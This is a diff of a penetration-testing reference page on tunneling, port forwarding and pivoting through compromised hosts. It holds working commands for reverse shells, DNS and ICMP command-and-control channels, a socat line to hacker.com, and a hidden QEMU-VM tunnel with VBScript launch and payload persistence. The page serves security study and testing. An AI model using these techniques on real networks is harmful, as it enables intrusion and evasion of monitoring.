 
 ```bash
 ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
 ```
 
-### Local Port2Port
+### Remote Port2Port
 
 Open new Port in SSH Server --> Other port
+
+Remote (`-R`) forwarding listens on the SSH server and connects to the local side; the explicit bind address controls which interfaces can reach that listener.<sup>[[6]](#references)</sup>
 
 ```bash
 ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere
@@ -51,6 +57,8 @@ ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in
 
 Local port --> Compromised host (SSH) --> Third_box:Port
 
+Local (`-L`) forwarding listens on the client and connects to the destination from the SSH server side.<sup>[[6]](#references)</sup>
+
 ```bash
 ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f]  #This way the terminal is still in your host
 #Example
@@ -61,6 +69,8 @@ sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
 
 Local Port --> Compromised host (SSH) --> Wherever
 
+Dynamic (`-D`) forwarding creates a local SOCKS4/SOCKS5 listener whose connections are opened from the remote side.<sup>[[6]](#references)</sup>
+
 ```bash
 ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
 ```
@@ -68,6 +78,8 @@ ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port
 ### Reverse Port Forwarding
 
 This is useful to get reverse shells from internal hosts through a DMZ to your host:
+
+The server's `GatewayPorts` setting controls whether a remote forward may bind beyond loopback; its default is `no`.<sup>[[7]](#references)</sup>
 
 ```bash
 ssh -i dmz_key -R <dmz_internal_ip>:443:0.0.0.0:7000 root@10.129.203.111 -vN
@@ -80,7 +92,7 @@ ssh -i dmz_key -R <dmz_internal_ip>:443:0.0.0.0:7000 root@10.129.203.111 -vN
 
 ### VPN-Tunnel
 
-You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\
+This root-based example creates tunnel devices on both hosts. The server must permit tun forwarding and the selected account must have access to the tun device; `PermitRootLogin yes` is one way to use the `root` account here.<sup>[[6]](#references)[[7]](#references)</sup>\
 `PermitRootLogin yes`\
 `PermitTunnel yes`
 
@@ -107,12 +119,14 @@ route add -net 10.0.0.0/16 gw 1.1.1.1
 
 > [!NOTE]
 > **Security – Terrapin Attack (CVE-2023-48795)**  
-> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. 
+> OpenSSH 9.6 added a strict-KEX extension to counter Terrapin's early-transport integrity attack. Update both peers where possible and follow vendor guidance for older implementations instead of assuming that a forwarded channel is protected by the version alone.<sup>[[8]](#references)</sup>
 
 ## SSHUTTLE
 
 You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\
 For example, forwarding all the traffic going to 10.10.10.0/24
+
+`sshuttle` provides transparent proxying over SSH and supports selecting subnets and a custom SSH command as shown below.<sup>[[9]](#references)</sup>
 
 ```bash
 pip install sshuttle
@@ -127,6 +141,8 @@ sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa'
 ```
 
 ## Meterpreter
+
+Metasploit's `portfwd` supports local and remote forwarding, while its SOCKS proxy module is intended to work with session routes or `autoroute` and listens on port 1080 by default in these examples.<sup>[[10]](#references)[[11]](#references)[[12]](#references)</sup>
 
 ### Port2Port
 
@@ -164,9 +180,11 @@ echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
 
 ## Cobalt Strike
 
+Cobalt Strike's Beacon can relay SOCKS4a/SOCKS5 connections through a Beacon; `rportfwd` binds on the compromised host, while `rportfwd_local` initiates the destination connection from the Cobalt Strike client.<sup>[[13]](#references)[[14]](#references)</sup>
+
 ### SOCKS proxy
 
-Open a port in the teamserver listening in all the interfaces that can be used to **route the traffic through the beacon**.
+Open a port in the Team Server on the interfaces that should route traffic through the Beacon.<sup>[[13]](#references)</sup>
 
 ```bash
 beacon> socks 1080
@@ -179,23 +197,23 @@ proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
 ### rPort2Port
 
 > [!WARNING]
-> In this case, the **port is opened in the beacon host**, not in the Team Server and the traffic is sent to the Team Server and from there to the indicated host:port
+> In this case, the **port is opened in the Beacon host**, not in the Team Server, and the traffic is sent to the Team Server and from there to the indicated host:port.<sup>[[14]](#references)</sup>
 
 ```bash
 rportfwd [bind port] [forward host] [forward port]
 rportfwd stop [bind port]
 ```
 
-To note:
+The reverse-forwarding manual notes the following behavior:<sup>[[14]](#references)</sup>
 
 - Beacon's reverse port forward is designed to **tunnel traffic to the Team Server, not for relaying between individual machines**.
 - Traffic is **tunneled within Beacon's C2 traffic**, including P2P links.
-- **Admin privileges are not required** to create reverse port forwards on high ports.
+- High ports usually avoid privileged-port restrictions, but the target OS policy and existing listeners still apply.
 
 ### rPort2Port local
 
 > [!WARNING]
-> In this case, the **port is opened in the beacon host**, not in the Team Server and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port
+> In this case, the **port is opened in the Beacon host**, not in the Team Server, and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port.<sup>[[14]](#references)</sup>
 
 ```bash
 rportfwd_local [bind port] [forward host] [forward port]
@@ -206,7 +224,7 @@ rportfwd_local stop [bind port]
 
 [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
 
-You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp
+The project supplies web tunnel endpoints such as `tunnel.aspx`, `tunnel.ashx`, `tunnel.jsp`, and `tunnel.php`; upload one supported endpoint before starting the local proxy.<sup>[[15]](#references)</sup>
 
 ```bash
 python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
@@ -215,7 +233,7 @@ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/t
 ## Chisel
 
 You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
-You need to use the **same version for client and server**
+Chisel carries TCP/UDP traffic over HTTP using an SSH-protected connection; use compatible client/server builds and verify the selected release's command syntax.<sup>[[16]](#references)</sup>
 
 ### socks
 
@@ -239,7 +257,7 @@ You need to use the **same version for client and server**
 
 [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng)
 
-**Use the same version for agent and proxy**
+The Ligolo-ng quickstart documents a TUN interface on the proxy, certificate-fingerprint validation for the agent, and route setup for the tunneled network.<sup>[[17]](#references)</sup>
 
 ### Tunneling
 
@@ -267,6 +285,8 @@ interface_list
 
 ### Agent Binding and Listening
 
+Ligolo-ng can add listeners on the agent that forward to a proxy-side address, and its reserved `240.0.0.0/4` range can be routed to reach agent-local services.<sup>[[18]](#references)[[19]](#references)</sup>
+
 ```bash
 # Establish a tunnel from the proxy server to the agent
 # Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attacker
@@ -287,8 +307,7 @@ interface_add_route --name "ligolo" --route 240.0.0.1/32
 
 [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
 
-Reverse tunnel. The tunnel is started from the victim.\
-A socks4 proxy is created on 127.0.0.1:1080
+Rpivot starts the reverse tunnel from the victim and exposes a SOCKS4 proxy on the attacker's loopback address; its README also documents NTLM-proxy credentials and hash options.<sup>[[20]](#references)</sup>
 
 ```bash
 attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
@@ -311,6 +330,8 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
 ## **Socat**
 
 [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
+
+Socat composes address types such as `TCP-LISTEN`, `EXEC`, `SOCKS4A`, `OPENSSL`, and `PROXY`; the examples below combine those documented endpoints.<sup>[[21]](#references)</sup>
 
 ### Bind shell
 
@@ -350,7 +371,7 @@ victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server
 #Execute the meterpreter
 ```
 
-You can bypass a **non-authenticated proxy** executing this line instead of the last one in the victim's console:
+You can traverse a **non-authenticated proxy** with socat's documented `PROXY` address type by executing this line instead of the last one in the victim's console.<sup>[[21]](#references)</sup>
 
 ```bash
 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5
@@ -390,20 +411,22 @@ attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh o
 
 ## Plink.exe
 
-It's like a console PuTTY version ( the options are very similar to an ssh client).
+Plink is PuTTY's command-line connection tool, with SSH forwarding options similar to `ssh`.<sup>[[22]](#references)</sup>
 
-As this binary will be executed in the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward only locally accessible port to a port in our machine:
+Use uppercase `-P` for the SSH port. `-pw` is retained for compatibility but exposes the password in the process list; prefer key authentication or `-pwfile` where possible.<sup>[[22]](#references)[[23]](#references)</sup>
+
+As this binary will be executed in the victim and it is an SSH client, open the SSH service and port for the reverse connection; the following uses `-R` to forward a locally accessible port to the attacker's machine.<sup>[[22]](#references)</sup>
 
 ```bash
-echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
-echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
+echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-P <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
+echo y | plink.exe -l root -pw password [-P 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
 ```
 
 ## Windows netsh
 
 ### Port2Port
 
-You need to be a local admin (for any port)
+Use a context with the permissions required by the host when creating or changing persistent `portproxy` rules. Microsoft documents the `v4tov4` add, show, and delete forms used below.<sup>[[24]](#references)</sup>
 
 ```bash
 netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
@@ -419,6 +442,8 @@ netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
 
 You need to have **RDP access over the system**.\
 Download:
+
+SocksOverRDP uses Remote Desktop Dynamic Virtual Channels to carry a SOCKS5 connection over an existing RDP session; the client plugin listens on `127.0.0.1:1080` while the server component runs on the RDP target.<sup>[[25]](#references)</sup>
 
 1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
 2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
@@ -444,28 +469,27 @@ Now, confirm in you machine (attacker) that the port 1080 is listening:
 netstat -antb | findstr 1080
 ```
 
-Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
+Now you can use [**Proxifier**](https://www.proxifier.com/) to proxy the traffic through that port.<sup>[[26]](#references)</sup>
 
 ## Proxify Windows GUI Apps
 
-You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
+You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).<sup>[[26]](#references)</sup>\
 In **Profile -> Proxy Servers** add the IP and port of the SOCKS server.\
-In **Profile -> Proxification Rules** add the name of the program to proxify and the connections to the IPs you want to proxify.
+In **Profile -> Proxification Rules** add the name of the program to proxify and the connections to the IPs you want to proxify; Proxifier rules can match applications, target hosts, and ports.<sup>[[27]](#references)</sup>
 
-## NTLM proxy bypass
+## Tunnel through an NTLM proxy
 
-The previously mentioned tool: **Rpivot**\
-**OpenVPN** can also bypass it, setting these options in the configuration file:
+The previously mentioned tool, **Rpivot**, can relay through an NTLM-authenticating proxy. **OpenVPN** can also route through one when configured with an auth file and the NTLMv2 method; this is proxy traversal, not a bypass of proxy authentication.<sup>[[20]](#references)[[28]](#references)</sup>
 
 ```bash
-http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
+http-proxy <proxy_ip> 8080 <file_with_creds> ntlm2
 ```
 
 ### Cntlm
 
 [http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/)
 
-It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\
+Cntlm authenticates to upstream NTLM proxies, exposes local listeners, and can map a local tunnel port to a destination service; clients can then use that local port.<sup>[[29]](#references)</sup>\
 For example that forward port 443
 
 ```
@@ -476,12 +500,12 @@ Proxy 10.0.0.10:8080
 Tunnel 2222:<attackers_machine>:443
 ```
 
-Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\
-You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
+Now, if you set for example in the victim the **SSH** service to listen in port 443, you can connect to it through the attacker port 2222.<sup>[[29]](#references)</sup>\
+You could also use a **meterpreter** that connects to localhost:443 while the attacker listens on port 2222.<sup>[[29]](#references)</sup>
 
 ## YARP
 
-A reverse proxy created by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
+YARP (Yet Another Reverse Proxy) is Microsoft's .NET reverse-proxy toolkit. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy).<sup>[[30]](#references)</sup>
 
 ## DNS Tunneling
 
@@ -489,7 +513,7 @@ A reverse proxy created by Microsoft. You can find it here: [https://github.com/
 
 [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
 
-Root is needed in both systems to create tun adapters and tunnel data between them using DNS queries.
+Iodine creates an IPv4 tunnel through DNS queries and uses TUN interfaces; the documented setup requires the privileges needed to create those interfaces on both ends.<sup>[[31]](#references)</sup>
 
 ```
 attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
@@ -497,7 +521,7 @@ victim> iodine -f -P P@ssw0rd tunneldomain.com -r
 #You can see the victim at 1.1.1.2
 ```
 
-The tunnel will be very slow. You can create a compressed SSH connection through this tunnel by using:
+DNS transport has higher overhead than direct TCP and is typically slow; you can create a compressed SSH connection through this tunnel by using:<sup>[[31]](#references)</sup>
 
 ```
 ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
@@ -507,7 +531,7 @@ ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
 
 [**Download it from here**](https://github.com/iagox86/dnscat2)**.**
 
-Establishes a C\&C channel through DNS. It doesn't need root privileges.
+Dnscat2 establishes an encrypted command-and-control channel through DNS; the server and client commands below follow its documented usage.<sup>[[32]](#references)</sup>
 
 ```bash
 attacker> ruby ./dnscat2.rb tunneldomain.com
@@ -520,7 +544,7 @@ victim> ./dnscat2 --dns host=10.10.10.10,port=5353
 
 #### **In PowerShell**
 
-You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
+You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in PowerShell; its README documents the `Start-Dnscat2` parameters shown below.<sup>[[33]](#references)</sup>
 
 ```
 Import-Module .\dnscat2.ps1
@@ -529,6 +553,8 @@ Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret som
 
 #### **Port forwarding with dnscat**
 
+Dnscat2's interactive `listen` command maps a local listener to a remote host and port.<sup>[[32]](#references)</sup>
+
 ```bash
 session -i <sessions_id>
 listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
@@ -536,7 +562,7 @@ listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this b
 
 #### Change proxychains DNS
 
-Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
+Proxychains-ng hooks dynamically linked TCP connections and cannot carry UDP or ICMP; DNS proxying is configurable, so inspect the installed `proxychains.conf` and resolver helper instead of assuming a fixed public resolver. Legacy `proxyresolv` scripts expose `PROXY_DNS_SERVER` for choosing the resolver; use a resolver reachable from the pivot when internal names are required.<sup>[[34]](#references)[[35]](#references)</sup>
 
 ## Tunnels in Go
 
@@ -573,7 +599,7 @@ Blue Team notes
 • For HTTP, flag text/plain POST bodies that are pure hex and multiple of two bytes.
 
 {{#note}}
-The entire channel fits inside **standard RFC-compliant queries** and keeps each sub-domain label under 63 bytes, making it stealthy in most DNS logs.
+The channel keeps each sub-domain label within the 63-octet DNS limit, but protocol compliance alone does not make it stealthy; rare domains, long hexadecimal labels, and query volume remain detection signals.<sup>[[2]](#references)[[36]](#references)</sup>
 {{#endnote}}
 
 ## ICMP Tunneling
@@ -583,7 +609,7 @@ The entire channel fits inside **standard RFC-compliant queries** and keeps each
 [https://github.com/friedrich/hans](https://github.com/friedrich/hans)\
 [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
 
-Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests.
+Hans documents an IPv4-over-ICMP tunnel using a TUN device and ICMP echo requests; the setup requires privileges sufficient to create the interface.<sup>[[37]](#references)</sup>
 
 ```bash
 ./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
@@ -594,6 +620,8 @@ ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.1
 ### ptunnel-ng
 
 [**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
+
+ptunnel-ng transports TCP connections over ICMP and uses the `-p`, `-l`, `-r`, and `-R` options shown below for the proxy, local listener, destination host, and destination port.<sup>[[38]](#references)</sup>
 
 ```bash
 # Generate it
@@ -611,8 +639,7 @@ ssh -D 9050 -p 2222 -l user 127.0.0.1
 
 ## ngrok
 
-[**ngrok**](https://ngrok.com/) **is a tool to expose solutions to Internet in one command line.**\
-_Exposition URI are like:_ **UID.ngrok.io**
+[**ngrok**](https://ngrok.com/) is an agent for putting local network services online through a secure tunnel; its CLI documents HTTP, TCP, and file URL endpoints, and the printed endpoint hostname can vary by endpoint and account.<sup>[[39]](#references)</sup>
 
 ### Installation
 
@@ -630,7 +657,7 @@ chmod a+x ./ngrok
 
 **Documentation:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/).
 
-_It is also possible to add authentication and TLS, if necessary._
+_The agent also supports authentication and TLS options when needed.<sup>[[39]](#references)</sup>_
 
 #### Tunneling TCP
 
@@ -652,9 +679,11 @@ _It is also possible to add authentication and TLS, if necessary._
 #### Sniffing HTTP calls
 
 _Useful for XSS,SSRF,SSTI ..._\
-Directly from stdout or in the HTTP interface [http://127.0.0.1:4040](http://127.0.0.1:4000).
+The standalone agent exposes its HTTP inspection interface at `http://127.0.0.1:4040` by default; the interface is for HTTP traffic.<sup>[[40]](#references)</sup>
 
 #### Tunneling internal HTTP service
+
+The `--host-header=rewrite` option rewrites the upstream HTTP `Host` header to match the local service.<sup>[[41]](#references)</sup>
 
 ```bash
 ./ngrok http localhost:8080 --host-header=rewrite
@@ -665,16 +694,17 @@ Directly from stdout or in the HTTP interface [http://127.0.0.1:4040](http://127
 
 #### ngrok.yaml simple configuration example
 
-It opens 3 tunnels:
+This uses ngrok Agent Config v2; named tunnels use `proto` and `addr` and are started with `ngrok start`.<sup>[[42]](#references)</sup> It opens 3 tunnels:
 
 - 2 TCP
 - 1 HTTP with static files exposition from /tmp/httpbin/
 
 ```yaml
+version: 2
 tunnels:
   mytcp:
     addr: 4444
-    proto: tcptunne
+    proto: tcp
   anothertcp:
     addr: 5555
     proto: tcp
@@ -685,7 +715,7 @@ tunnels:
 
 ## Cloudflared (Cloudflare Tunnel)
 
-Cloudflare’s `cloudflared` daemon can create outbound tunnels that expose **local TCP/UDP services** without requiring inbound firewall rules, using Cloudflare’s edge as the rendez-vous point. This is very handy when the egress firewall only allows HTTPS traffic but inbound connections are blocked.
+Cloudflare Tunnel's `cloudflared` connector establishes outbound connections; published applications can route HTTP, HTTPS, TCP, SSH, and RDP, while quick tunnels are intended for HTTP development.<sup>[[43]](#references)[[45]](#references)</sup>
 
 ### Quick tunnel one-liner
 
@@ -695,21 +725,24 @@ cloudflared tunnel --url http://localhost:8080
 # => Generates https://<random>.trycloudflare.com that forwards to 127.0.0.1:8080
 ```
 
-### SOCKS5 pivot
+### SOCKS5 origin (legacy mode)
+
+The legacy `--socks5` flag tells `cloudflared` that the local origin speaks SOCKS5; it does not create a local SOCKS5 listener. For a managed tunnel, `originRequest.proxyType: socks` configures SOCKS5 origin handling.<sup>[[44]](#references)</sup>
 
 ```bash
-# Turn the tunnel into a SOCKS5 proxy on port 1080
+# Expose a local SOCKS5-speaking origin (legacy syntax)
 cloudflared tunnel --url socks5://localhost:1080 --socks5
-# Now configure proxychains to use 127.0.0.1:1080
 ```
 
 ### Persistent tunnels with DNS
+
+Locally managed tunnel configuration uses lower-case `tunnel`, `credentials-file`, and `url` keys as shown below.<sup>[[46]](#references)</sup>
 
 ```bash
 cloudflared tunnel create mytunnel
 cloudflared tunnel route dns mytunnel internal.example.com
 # config.yml
-Tunnel: <TUNNEL-UUID>
+tunnel: <TUNNEL-UUID>
 credentials-file: /root/.cloudflared/<TUNNEL-UUID>.json
 url: http://127.0.0.1:8000
 ```
@@ -720,11 +753,11 @@ Start the connector:
 cloudflared tunnel run mytunnel
 ```
 
-Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. 
+The connector establishes outbound connections and, by default, negotiates QUIC with fallback to HTTP/2; do not assume every deployment uses TCP/443. Run it with only the privileges required by your deployment.<sup>[[43]](#references)[[47]](#references)</sup>
 
 ## FRP (Fast Reverse Proxy)
 
-[`frp`](https://github.com/fatedier/frp) is an actively-maintained Go reverse-proxy that supports **TCP, UDP, HTTP/S, SOCKS and P2P NAT-hole-punching**. Starting with **v0.53.0 (May 2024)** it can act as an **SSH Tunnel Gateway**, so a target host can spin up a reverse tunnel using only the stock OpenSSH client – no extra binary required.
+[`frp`](https://github.com/fatedier/frp) is a Go reverse proxy supporting **TCP, UDP, HTTP/S, STCP/SUDP, TCPMUX, and XTCP**. XTCP uses P2P hole punching whose success depends on NAT. Starting with **v0.53.0** it can act as an **SSH Tunnel Gateway**, so a target host can use the stock OpenSSH client without an `frpc` binary.<sup>[[48]](#references)[[49]](#references)[[50]](#references)</sup>
 
 ### Classic reverse TCP tunnel
 
@@ -758,16 +791,16 @@ sshTunnelGateway.bindPort = 2200   # add to frps.toml
 ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000
 ```
 
-The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. 
+The above command publishes the victim's port **8080** as **attacker_ip:9000** using the stock OpenSSH client while `frps` provides the gateway.<sup>[[50]](#references)</sup>
 
 ## Covert VM-based Tunnels with QEMU
 
-QEMU’s user-mode networking (`-netdev user`) supports an option called `hostfwd` that **binds a TCP/UDP port on the *host* and forwards it into the *guest***.  When the guest runs a full SSH daemon, the hostfwd rule gives you a disposable SSH jump box that lives entirely inside an ephemeral VM – perfect for hiding C2 traffic from EDR because all malicious activity and files stay in the virtual disk.<sup>[[1]](#references)</sup>
+QEMU user-mode networking does not require root or administrator privilege for the virtual network, and `-netdev user,hostfwd=...` redirects TCP, UDP, or UNIX connections from the host to the guest.<sup>[[51]](#references)</sup> TrustedSec documented a Tiny Core QEMU VM and an attempted reverse SSH tunnel in an incident where host-focused EDR could miss activity inside the guest.<sup>[[1]](#references)</sup>
 
 ### Quick one-liner
 
 ```powershell
-# Windows victim (no admin rights, no driver install – portable binaries only)
+# Windows victim (user-mode networking; no TAP driver is needed for this example)
 qemu-system-x86_64.exe ^
    -m 256M ^
    -drive file=tc.qcow2,if=ide ^
@@ -776,11 +809,13 @@ qemu-system-x86_64.exe ^
    -nographic
 ```
 
-• The command above launches a **Tiny Core Linux** image (`tc.qcow2`) in RAM.  
+• The command above launches a **Tiny Core Linux** guest with 256 MiB of guest memory and a qcow2 disk image; the disk image is not an in-RAM disk.
 • Port **2222/tcp** on the Windows host is transparently forwarded to **22/tcp** inside the guest.  
 • From the attacker’s point of view the target simply exposes port 2222; any packets that reach it are handled by the SSH server running in the VM.
 
 ### Launching stealthily through VBScript
+
+TrustedSec observed VBS-driven QEMU launches and Tiny Core images in the incident cited above.<sup>[[1]](#references)</sup>
 
 ```vb
 ' update.vbs – lived in C:\ProgramData\update
@@ -788,11 +823,11 @@ Set o = CreateObject("Wscript.Shell")
 o.Run "stl.exe -m 256M -drive file=tc.qcow2,if=ide -netdev user,id=n0,hostfwd=tcp::2222-:22", 0
 ```
 
-Running the script with `cscript.exe //B update.vbs` keeps the window hidden.
+Running the script with `cscript.exe //B update.vbs` keeps the window hidden.<sup>[[1]](#references)</sup>
 
 ### In-guest persistence
 
-Because Tiny Core is stateless, attackers usually:
+The cited incident describes persistence in the stateless Tiny Core guest through `/opt/bootlocal.sh` and `/opt/filetool.lst`:<sup>[[1]](#references)</sup>
 
 1. Drop payload to `/opt/123.out`  
 2. Append to `/opt/bootlocal.sh`:
@@ -804,11 +839,10 @@ Because Tiny Core is stateless, attackers usually:
 
 3. Add `home/tc` and `opt` to `/opt/filetool.lst` so the payload is packed into `mydata.tgz` on shutdown.
 
-### Why this evades detection
+### Telemetry considerations
 
-• Only two unsigned executables (`qemu-system-*.exe`) touch disk; no drivers or services are installed.  
-• Security products on the host see **benign loopback traffic** (the actual C2 terminates inside the VM).  
-• Memory scanners never analyse the malicious process space because it lives in a different OS.
+• The host still exposes the QEMU process, qcow2 image, and any host-forwarded listener.
+• Host-only process scans may not inspect guest processes, but virtualization is not guaranteed evasion; network, QEMU, and image telemetry can still expose it.<sup>[[1]](#references)[[51]](#references)</sup>
 
 ### Defender tips
 
@@ -818,10 +852,12 @@ Because Tiny Core is stateless, attackers usually:
 
 ## IIS/HTTP.sys relay nodes via `HttpAddUrl` (ShadowPad)
 
-Ink Dragon’s ShadowPad IIS module turns every compromised perimeter web server into a dual-purpose **backdoor + relay** by binding covert URL prefixes directly at the HTTP.sys layer:<sup>[[3]](#references)</sup>
+Check Point describes ShadowPad's IIS module as turning compromised perimeter web servers into backdoor and relay nodes by binding URL prefixes through `HttpAddUrl`.<sup>[[3]](#references)</sup>
+
+The same report details the defaults, wildcard listeners, packet decryption, relay queues, and debug telemetry summarized below.<sup>[[3]](#references)</sup>
 
 * **Config defaults** – if the module’s JSON config omits values, it falls back to believable IIS defaults (`Server: Microsoft-IIS/10.0`, `DocumentRoot: C:\inetpub\wwwroot`, `ErrorPage: C:\inetpub\custerr\en-US\404.htm`). That way benign traffic is answered by IIS with the correct branding.
-* **Wildcard interception** – operators supply a semicolon-separated list of URL prefixes (wildcards in host + path). The module calls `HttpAddUrl` for each entry, so HTTP.sys routes matching requests to the malicious handler *before* the request reaches IIS modules.
+* **Wildcard interception** – operators supply a semicolon-separated list of URL prefixes (wildcards in host + path). The module calls `HttpAddUrl` for each entry, so HTTP.sys routes matching requests to the malicious handler; nonmatching requests fall back to normal IIS behavior.
 * **Encrypted first packet** – the first two bytes of the request body carry the seed for a custom 32-bit PRNG. Every subsequent byte is XOR-ed with the generated keystream before protocol parsing:
 
   ```python
@@ -851,5 +887,53 @@ Ink Dragon’s ShadowPad IIS module turns every compromised perimeter web server
 - [1] [Hiding in the Shadows: Covert Tunnels via QEMU Virtualization](https://trustedsec.com/blog/hiding-in-the-shadows-covert-tunnels-via-qemu-virtualization)
 - [2] [Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations](https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/)
 - [3] [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
+- [4] [Evil-WinRM README](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/README.md)
+- [5] [Nmap Reference Guide: Bypass Firewall/IDS Restrictions](https://nmap.org/book/man-bypass-firewalls-ids.html)
+- [6] [OpenBSD ssh manual](https://man.openbsd.org/ssh)
+- [7] [OpenBSD sshd_config manual](https://man.openbsd.org/sshd_config)
+- [8] [OpenSSH 9.6 release notes](https://www.openssh.org/txt/release-9.6)
+- [9] [sshuttle README](https://raw.githubusercontent.com/sshuttle/sshuttle/master/README.rst)
+- [10] [Metasploit: Pivoting in Metasploit](https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html)
+- [11] [Metasploit socks_proxy module documentation](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/documentation/modules/auxiliary/server/socks_proxy.md)
+- [12] [Metasploit autoroute module documentation](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/documentation/modules/post/multi/manage/autoroute.md)
